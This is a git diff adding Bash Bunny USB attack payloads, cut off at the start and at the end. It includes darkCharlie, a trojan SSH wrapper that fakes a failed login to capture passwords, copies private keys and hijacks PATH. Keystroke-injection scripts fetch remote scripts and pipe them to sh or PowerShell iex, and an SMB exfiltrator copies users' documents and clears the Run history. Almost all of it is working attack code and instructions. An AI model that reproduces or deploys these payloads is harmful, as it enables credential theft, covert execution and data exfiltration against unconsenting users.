json.dump(initialData, lootFile)
|
||||
lootFile.close()
|
||||
|
||||
def addDefaultSSHConfigFilesToLoot(lootData): #using lootData as a reference here, no returns
|
||||
mainConfigData, userConfigData = analyzeDefaultSSHConfigFiles()
|
||||
mainConfigHash, mainData = mainConfigData
|
||||
userConfigHash, userData = userConfigData
|
||||
lootData["configFiles"][mainConfigHash] = mainData
|
||||
lootData["configFiles"]["main"] = mainData
|
||||
lootData["configFiles"][userConfigHash] = userData
|
||||
lootData["configFiles"]["user"] = userData
|
||||
|
||||
def analyzeDefaultSSHConfigFiles():
|
||||
import os
|
||||
try:
|
||||
mainConfigData = analyzeConfigFile("/etc/ssh/ssh_config")
|
||||
if mainConfigData:
|
||||
mainFileHash, mainData = mainConfigData
|
||||
else:
|
||||
mainFileHash = None
|
||||
mainData = None
|
||||
except:
|
||||
mainFileHash = None
|
||||
mainData = None
|
||||
try:
|
||||
userConfigFileName = os.getenv("HOME") + "/.ssh/config"
|
||||
userConfigData = analyzeConfigFile(userConfigFileName)
|
||||
if userConfigData:
|
||||
userFileHash, userData = userConfigData
|
||||
else:
|
||||
userFileHash = None
|
||||
userData = None
|
||||
except:
|
||||
userFileHash = None
|
||||
userData = None
|
||||
return ((mainFileHash, mainData), (userFileHash, userData))
|
||||
|
||||
def loadLootFile(lootFileName):
|
||||
import json
|
||||
try:
|
||||
file = open(lootFileName, 'r')
|
||||
data = json.load(file)
|
||||
file.close()
|
||||
return data
|
||||
except:
|
||||
return False
|
||||
|
||||
def saveLootFile(loot, lootFileName):
|
||||
import json
|
||||
try:
|
||||
file = open(lootFileName, 'w')
|
||||
json.dump(loot, file)
|
||||
file.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
class SSHArgHandler(object):
|
||||
|
||||
def __init__(self, rawArgList):
|
||||
self.password = None
|
||||
self.optionsDict = self.getOptionsDict(rawArgList)
|
||||
self.keyFileName = self.findArgument("-i", rawArgList)
|
||||
if self.keyFileName:
|
||||
self.keyFile = snarfKeyFile(self.keyFileName)
|
||||
else:
|
||||
self.keyFile = None
|
||||
self.configFile = self.findArgument("-F", rawArgList)
|
||||
if self.configFile:
|
||||
configFileInfo = analyzeConfigFile(self.configFile)
|
||||
else:
|
||||
configFileInfo = None
|
||||
if configFileInfo:
|
||||
self.configFileHash, self.configFileDict = configFileInfo
|
||||
else:
|
||||
self.configFileHash = None
|
||||
self.configFileDict = None
|
||||
self.host = rawArgList[-1]
|
||||
if "@" in self.host:
|
||||
self.host = self.host.split("@")[-1]
|
||||
self.port = self.findArgument("-p", rawArgList)
|
||||
self.user = self.findUserName(rawArgList)
|
||||
self.commandOptions = " ".join(rawArgList[1:])
|
||||
self.intendedCommand = originalSSHExecutable + " " + self.commandOptions
|
||||
|
||||
def findUserName(self, args):
|
||||
user = self.findArgument("-l", args)
|
||||
if not user:
|
||||
if "@" in args[-1]:
|
||||
user = args[-1].split("@")[0]
|
||||
if not user:
|
||||
if "User" in self.optionsDict:
|
||||
user = self.optionsDict["User"]
|
||||
if not user:
|
||||
if self.configFileDict and self.host in self.configFileDict:
|
||||
if "User" in self.configFileDict[self.host]:
|
||||
user = self.configFileDict[self.host]["User"]
|
||||
if not user:
|
||||
return "None"
|
||||
return user
|
||||
|
||||
def getOptionsDict(self, args):
|
||||
interestingArgs = args[1:-1]
|
||||
options = {}
|
||||
for i in range(len(interestingArgs)):
|
||||
rawOption = None
|
||||
if interestingArgs[i].startswith("-o"):
|
||||
if len(interestingArgs[i]) > 2:
|
||||
rawOption = interestingArgs[i][2:]
|
||||
elif i == len(interestingArgs) - 1: #somebody probably messed up the command
|
||||
continue
|
||||
else:
|
||||
rawOption = interestingArgs[i + 1]
|
||||
if rawOption:
|
||||
optionList = rawOption.split("=")
|
||||
if len(optionList) == 2:
|
||||
key, value = optionList
|
||||
options[key] = value
|
||||
return options
|
||||
|
||||
def findArgument(self, argOfInterest, args): #this assumes the argument of interest should only show up in the command once
|
||||
interestingArgs = args[1:-1]
|
||||
for i in range(len(interestingArgs)):
|
||||
if interestingArgs[i].startswith(argOfInterest):
|
||||
if len(interestingArgs[i]) > 2 and not argOfInterest.startswith("--"):
|
||||
value = interestingArgs[i][2:]
|
||||
elif i == len(interestingArgs) - 1: #ten bucks says this probably won't run
|
||||
continue
|
||||
else:
|
||||
return interestingArgs[i + 1]
|
||||
return None
|
||||
|
||||
def saveData(self):
|
||||
infoDict = {}
|
||||
if self.password:
|
||||
infoDict["password"] = self.password
|
||||
if self.optionsDict:
|
||||
infoDict["options"] = self.optionsDict
|
||||
if self.keyFile:
|
||||
infoDict["privateKey"] = self.keyFile
|
||||
if self.host:
|
||||
infoDict["host"] = self.host
|
||||
if self.port:
|
||||
infoDict["port"] = self.port
|
||||
if self.user:
|
||||
infoDict["user"] = self.user
|
||||
return infoDict
|
||||
|
||||
def analyzeConfigFile(configFileName): #The tat rolled a 20?
|
||||
import os
|
||||
import re
|
||||
regexSplitter = re.compile("[\s\=]")
|
||||
if not os.path.isfile(configFileName):
|
||||
return False
|
||||
file = open(configFileName, 'r')
|
||||
data = file.read()
|
||||
file.close()
|
||||
fileHash = hash(data)
|
||||
data = data.split("\n")
|
||||
currentHostNickname = "None"
|
||||
hostDict = {}
|
||||
for line in data:
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
if line.startswith("#"):
|
||||
continue
|
||||
if line.startswith("Host") and line.split()[0] == "Host":
|
||||
hostLine = re.split(regexSplitter, line)
|
||||
if len(hostLine) > 1:
|
||||
currentHostNickname = hostLine[1]
|
||||
else:
|
||||
currentHostNickname = "None"
|
||||
if not currentHostNickname in hostDict:
|
||||
hostDict[currentHostNickname] = {}
|
||||
continue
|
||||
lineSplit = re.split(regexSplitter, line)
|
||||
if len(lineSplit) == 1:
|
||||
hostDict[currentHostNickname][lineSplit[0]] = "None"
|
||||
else:
|
||||
key = lineSplit[0]
|
||||
value = " ".join(lineSplit[1:])
|
||||
try:
|
||||
if key == "IdentityFile":
|
||||
keyRead = snarfKeyFile(value)
|
||||
if not keyRead:
|
||||
value += "(FILENOTFOUND)"
|
||||
else:
|
||||
value = keyRead
|
||||
except:
|
||||
value = "UnableToLoad"
|
||||
hostDict[currentHostNickname][key] = value
|
||||
return (fileHash, hostDict)
|
||||
|
||||
def snarfKeyFile(keyFileName):
|
||||
import os
|
||||
import base64
|
||||
if not os.path.isfile(keyFileName):
|
||||
return False
|
||||
keyFile = open(keyFileName, 'rb')
|
||||
key = keyFile.read()
|
||||
keyFile.close()
|
||||
return base64.b64encode(key).decode()
|
||||
|
||||
def paramikoSaysWeNeedAPassword(host, port, user):
|
||||
try:
|
||||
import paramiko
|
||||
except cantLoadModuleError():
|
||||
return True #default to true if we can't check it
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
|
||||
try:
|
||||
ssh.connect(host, port = int(port), username = user)
|
||||
ssh.close()
|
||||
return False
|
||||
except paramiko.ssh_exception.SSHException:
|
||||
try:
|
||||
ssh.connect(host, port = int(port), username = user, password = "12345") #probably not their real password unless they're an idiot and this is their luggage
|
||||
ssh.close()
|
||||
return False
|
||||
except paramiko.ssh_exception.AuthenticationException:
|
||||
return True
|
||||
except:
|
||||
return False
|
||||
|
||||
def paramikoApprovesOfThisPassword(host, port, user, password):
|
||||
try:
|
||||
import paramiko
|
||||
except cantLoadModuleError():
|
||||
return True #default to true if we can't check it
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
|
||||
try:
|
||||
ssh.connect(host, port = int(port), username = user, password = password) #hopefully their real password
|
||||
ssh.close()
|
||||
return True
|
||||
except paramiko.ssh_exception.AuthenticationException:
|
||||
return False
|
||||
|
||||
def parseArguments():
|
||||
import sys
|
||||
argList = sys.argv
|
||||
if "--initializeScript" in sys.argv:
|
||||
initializeThisScript()
|
||||
else:
|
||||
return argList
|
||||
|
||||
def findHostInLootConfigs(lootFileData, host):
|
||||
for fileHash in lootFileData["configFiles"]:
|
||||
if lootFileData["configFiles"][fileHash] and host in lootFileData["configFiles"][fileHash]: #have to check if there is even file data there, otherwise we end up indexing into nothing and failing hard
|
||||
return lootFileData["configFiles"][fileHash][host]
|
||||
return None
|
||||
|
||||
def getUserName():
|
||||
import getpass
|
||||
return getpass.getuser()
|
||||
|
||||
def lowDownDirtyDeceiver(user, hostAddress):
|
||||
import getpass
|
||||
prompt = "%s@%s's password: " %(user, hostAddress)
|
||||
password = getpass.getpass(prompt)
|
||||
print("Permission denied, please try again.")
|
||||
return password
|
||||
|
||||
def shinyLetsBeBadGuys():
|
||||
argList = parseArguments()
|
||||
lootFileData = loadLootFile(getLootFileName())
|
||||
sshArgs = SSHArgHandler(argList)
|
||||
if sshArgs.configFileHash:
|
||||
lootFileData["configFiles"][sshArgs.configFileHash] = sshArgs.configFileDict
|
||||
addDefaultSSHConfigFilesToLoot(lootFileData)
|
||||
hostConfigFileData = findHostInLootConfigs(lootFileData, sshArgs.host)
|
||||
hostAddress = sshArgs.host
|
||||
userName = None
|
||||
hostPort = None
|
||||
password = None
|
||||
if lootFileData["configFiles"]["main"]:
|
||||
if "HostName" in lootFileData["configFiles"]["main"]:
|
||||
hostAddress = lootFileData["configFiles"]["main"]["HostName"]
|
||||
if "Port" in lootFileData["configFiles"]["main"]:
|
||||
hostPort = lootFileData["configFiles"]["main"]["Port"]
|
||||
if "IdentityFile" in lootFileData["configFiles"]["main"]:
|
||||
password = "file(%s)" %lootFileData["configFiles"]["main"]["IdentityFile"]
|
||||
if lootFileData["configFiles"]["user"]:
|
||||
if "HostName" in lootFileData["configFiles"]["user"]:
|
||||
hostAddress = lootFileData["configFiles"]["user"]["HostName"]
|
||||
if "Port" in lootFileData["configFiles"]["user"]:
|
||||
hostPort = lootFileData["configFiles"]["user"]["Port"]
|
||||
if "IdentityFile" in lootFileData["configFiles"]["user"]:
|
||||
password = "file(%s)" %lootFileData["configFiles"]["user"]["IdentityFile"]
|
||||
if hostConfigFileData:
|
||||
if "HostName" in hostConfigFileData:
|
||||
hostAddress = hostConfigFileData["HostName"]
|
||||
if "Port" in hostConfigFileData:
|
||||
hostPort = hostConfigFileData["Port"]
|
||||
if "IdentityFile" in hostConfigFileData:
|
||||
password = "file(%s)" %hostConfigFileData["IdentityFile"]
|
||||
if sshArgs.user:
|
||||
userName = sshArgs.user
|
||||
if sshArgs.port:
|
||||
hostPort = sshArgs.port
|
||||
if sshArgs.keyFile:
|
||||
password = "file(%s)" %sshArgs.keyFile
|
||||
if not userName:
|
||||
try:
|
||||
userName = getUserName()
|
||||
except:
|
||||
userName = "DefaultUserName"
|
||||
if not hostPort:
|
||||
hostPort = "22"
|
||||
hostInfo = "%s@%s:%s" %(userName, hostAddress, hostPort) # user@hostAddress:port
|
||||
if not password:
|
||||
if not hostInfo in lootFileData["passwords"]:
|
||||
gotValidPass = False
|
||||
while not gotValidPass:
|
||||
try:
|
||||
password = lowDownDirtyDeceiver(userName, hostAddress)
|
||||
except:
|
||||
password = "FailedToObtain"
|
||||
break
|
||||
try:
|
||||
gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password)
|
||||
except:
|
||||
break
|
||||
lootFileData["passwords"][hostInfo] = [password, sshArgs.intendedCommand, sshArgs.saveData()] #json doesn't do tuples anyway
|
||||
saveLootFile(lootFileData, getLootFileName())
|
||||
|
||||
if __name__ == '__main__':
|
||||
import os
|
||||
args = parseArguments()
|
||||
intendedCommand = args[:]
|
||||
intendedCommand[0] = originalSSHExecutable
|
||||
intendedCommand = " ".join(intendedCommand)
|
||||
try:
|
||||
if len(args) > 1:
|
||||
shinyLetsBeBadGuys()
|
||||
except: #I really feel weird doing a massive open-ended exception here... but silence
|
||||
pass
|
||||
os.system(intendedCommand)
|
||||
quit()
|
|
@ -0,0 +1,101 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Title: darkCharlie
|
||||
# Author: Michael Weinstein
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
#
|
||||
# Create a wrapper for ssh sessions that
|
||||
# will live inside ~/.config/ssh and be added
|
||||
# tn the $PATH.
|
||||
#
|
||||
# This payload was inspired greatly by SudoBackdoor
|
||||
# and much of the code here was derived (or copied
|
||||
# wholesale) from that with great thanks to oXis.
|
||||
#
|
||||
# White | Ready
|
||||
# Amber blinking | Waiting for server
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
DUCKY_LANG us
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening (credit audibleblink)
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
# that was brilliant!
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING python "~/.config/ssh/ssh" --initializeScript
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
else
|
||||
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" #Will test this on a mac when I finish up
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING python "~/.config/ssh/ssh" --initializeScript
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK DELAY 5000 #seems like macs need some extra time on this
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20
|
|
@ -0,0 +1,10 @@
|
|||
#!/bin/bash
|
||||
|
||||
chmod u+x ~/.config/ssh/ssh
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
#!/bin/bash
|
||||
|
||||
if [ ! -d ~/.config/ssh ]
|
||||
then
|
||||
mkdir -p ~/.config/ssh
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/ssh/ssh ]
|
||||
then
|
||||
rm ~/.config/ssh/ssh
|
||||
fi
|
|
@ -0,0 +1,36 @@
|
|||
# darkCharlie SSH credential grabber
|
||||
|
||||
* Author: Michael Weinstein
|
||||
* Version: 0.1
|
||||
* Target: Mac/Linux
|
||||
|
||||
Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference.
|
||||
|
||||
Current dev status: I have tested this with both private key and password auth on a linux machine and found it working. I have not extensively tested with config files, but the limited testing I have done suggests that it is working as intended. I have not tested yet on a mac, but will probably do so very soon. I still need to do some more polishing on this, and especially want to get the use of paramiko better where it can check if the login needs a password and then check if the password entered into the wrapper is valid.
|
||||
|
||||
## Description
|
||||
|
||||
Injector: Creates a folder called ~/.config/ssh where it puts a python wrapper for ssh. Next, it copies over the python SSH wrapper. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for SSH and the path for python. The initialization function also initializes a file for saving SSH creds and configuration details in JSON format. It will save the global and user SSH config file details immediately, including grabbing any private keys linked in the config file (if you know these will be of interest, you can exfiltrate them immediately). Finally, ~/.config/ssh is added as the first element on the user's PATH so that they will be running this wrapper instead of actually SSHing in. The main abnormality a user will see is if they need to manually enter a password, they'll get it "wrong" the first time and have to reenter it. This wrapper will load previous loot to see if a server's password has already been gotten and won't try to get it again to avoid raising suspicions.
|
||||
Cleaner: Gets back the file containing JSON-encoded SSH configuration and credential data. After exfiltration of the data, it will delete the directory and files it created and clean up its change to the bashrc or bash_profile.
|
||||
|
||||
## Configuration
|
||||
|
||||
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode.
|
||||
|
||||
## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.)
|
||||
Injector
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Amber blinking | Waiting for server |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
|
||||
Cleaner
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
|
@ -0,0 +1,15 @@
|
|||
#This is just an example script, you may want to replace it with a script of your choice
|
||||
$Picture=@"
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
"@
|
||||
|
||||
Sleep -s 5
|
||||
Write-Host -ForegroundColor red "$Picture"
|
||||
Sleep -s 2
|
||||
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"
|
Binary file not shown.
After Width: | Height: | Size: 31 KiB |
|
@ -0,0 +1,46 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SerialNumBunny
|
||||
# Description: Execute strings placed in the Bunny serial number
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
||||
# Starting as Ethernet device only first to get IP
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Switch to Ethernet & HID
|
||||
LED Y
|
||||
# Defining Device Identifiers - Serialnumber contains payload
|
||||
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
# disallow outgoing dns requests so the server is accessible immediately
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
#Opens hidden powershell instance
|
||||
Q DELAY 1500
|
||||
Q GUI r
|
||||
Q DELAY 500
|
||||
Q STRING "powershell"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
|
||||
Q DELAY 1000
|
||||
# Make sure that device ID matches what was defined above
|
||||
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
|
||||
Q DELAY 400
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,19 @@
|
|||
**Title: SerialNumBunny**
|
||||
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is SerialNumBunny?**
|
||||
|
||||
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
|
||||
|
||||
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
|
||||
|
||||
**Instruction:**
|
||||
|
||||
- Upload your script or the example provided onto your Bunnys switch folder.
|
||||
- Plug in the Bunny and let the magic happen.
|
||||
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
|
||||
|
||||
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: WifiSnatch
|
||||
# Description: Extract wifi information, such as passphrases & SSIDs
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.1
|
||||
# Category: Exfiltration
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -0,0 +1,50 @@
|
|||
# Faster SMB Exfiltrator V 2.0
|
||||
|
||||
* Author: Hak5Darren
|
||||
* Props: ImNatho, mike111b, madbuda, jblk01
|
||||
* Version: Version 1.6.1
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Exfiltration
|
||||
* Attackmodes: HID, Ethernet
|
||||
|
||||
## Description
|
||||
|
||||
Exfiltrates select files from users's documents folder via SMB.
|
||||
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
||||
|
||||
## Configuration
|
||||
|
||||
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------- | -------------------------------------- |
|
||||
| Red (blinking) | Impacket not found in /pentest |
|
||||
| Yellow Single | Ethernet Stage |
|
||||
| Yellow Double | HID Stage |
|
||||
| Cyan | Receiving files |
|
||||
| White | Moving liberated files to mass storage |
|
||||
| Green | Finished |
|
||||
|
||||
# NOTICE
|
||||
|
||||
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
|
||||
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
|
||||
|
||||
# Starting from a fresh Bash Bunny
|
||||
|
||||
1. apt update ; apt install gcc
|
||||
2. pip install impacket
|
||||
3. cd /tools/
|
||||
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
|
||||
|
||||
Both the username and the password have been set as 'user' and 'Password01' respectively.
|
||||
|
||||
# Changes to the payload.txt include:
|
||||
|
||||
* Support for SMB version 2 enabled.
|
||||
* Username and password set to bypass Microsoft's disallowing of anonymous access.
|
||||
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
|
|
@ -0,0 +1,85 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Faster SMB Exfiltrator version 2.0
|
||||
# Author: Hak5Darren
|
||||
# Props: ImNatho, mike111b, madbuda, jblk01
|
||||
# Version: 1.6.1
|
||||
# Category: Exfiltration
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ============
|
||||
# SETUP:
|
||||
#
|
||||
# 1. apt update ; apt install gcc
|
||||
# 2. pip install impacket
|
||||
# 3. cd /tools/
|
||||
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
#
|
||||
#
|
||||
# LED STATUS
|
||||
# ==========
|
||||
# FAIL........Failed to find dependencies
|
||||
# STAGE1......Ethernet Stage
|
||||
# STAGE2......HID Stage
|
||||
# SPECIAL.....Receiving Files
|
||||
# CLEANUP.....Moving Liberated Files
|
||||
# FINISH......Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# =======
|
||||
# Exfiltration options configured from included s.ps1 script
|
||||
|
||||
|
||||
######## INITIALIZATION ########
|
||||
REQUIRETOOL impacket
|
||||
GET SWITCH_POSITION
|
||||
# Make temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
# Delete any old exfiltration data
|
||||
rm -rf /loot/smb/*
|
||||
# Copy new powershell payload to smb share
|
||||
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
|
||||
# Make loot directory on USB Disk
|
||||
mkdir -p /root/udisk/loot/smb_exfiltrator
|
||||
|
||||
|
||||
######## ETHERNET STAGE ########
|
||||
LED STAGE1
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Start the SMB Server
|
||||
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
|
||||
|
||||
|
||||
######## HID STAGE ########
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
|
||||
GET HOST_IP
|
||||
LED STAGE2
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
RUN WIN powershell
|
||||
Q DELAY 1000
|
||||
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
LED SPECIAL
|
||||
# Wait until files are done copying
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
|
||||
######## CLEANUP ########
|
||||
LED CLEANUP
|
||||
# Delete EXFILTRATION_COMPLETE file
|
||||
rm -rf /loot/smb/EXFILTRATION_COMPLETE
|
||||
# Move files to udisk loot directory
|
||||
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/e/*
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
|
||||
######## FINISH ########
|
||||
# Trap is clean
|
||||
LED FINISH
|
|
@ -0,0 +1,9 @@
|
|||
$exfil_dir="$Env:UserProfile\Documents"
|
||||
$exfil_ext="*.docx"
|
||||
$exfil_ext1="*.pdf"
|
||||
$exfil_ext2="*.xlsx"
|
||||
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
||||
mkdir $loot_dir
|
||||
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
|
||||
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
|
@ -0,0 +1,46 @@
|
|||
# Title: adb shell dumpsys
|
||||
# Author: D14b0l1c
|
||||
#
|
||||
# Description:
|
||||
# Set the Bash Bunny to ECM Ethernet attack mode
|
||||
# Extract the IP address of the connected device from DHCP leases
|
||||
# Connect to the device using ADB over TCP/IP and save the output to a log file
|
||||
# Dump system information from the device and save it to a file
|
||||
# Indicate that the payload has finished executing
|
||||
#
|
||||
# LED States:
|
||||
# - Purple: Running HID emulation, connecting to the Android device
|
||||
# - Blue Blinking: Running the 'adb shell dumpsys' command
|
||||
# - Red Blinking: Failed to connect to the Android device
|
||||
# - Green: Finished
|
||||
|
||||
# Set the Bash Bunny to ECM Ethernet attack mode
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Wait for 5 seconds to ensure the network interface is ready
|
||||
sleep 5
|
||||
|
||||
# Extract the IP address of the connected device from DHCP leases
|
||||
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
|
||||
# Save the obtained IP address to a log file
|
||||
cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt
|
||||
|
||||
# Connect to the device using ADB over TCP/IP and save the output to a log file
|
||||
adb connect ${TARGET_IP}
|
||||
adb connect ${TARGET_IP} > /root/logs.txt
|
||||
|
||||
# Wait for 20 seconds (optional)
|
||||
sleep 20
|
||||
|
||||
# Dump system information from the device and save it to a file
|
||||
adb shell dumpsys > /root/dumpsys.txt
|
||||
|
||||
# Wait for 10 seconds (optional)
|
||||
sleep 10
|
||||
|
||||
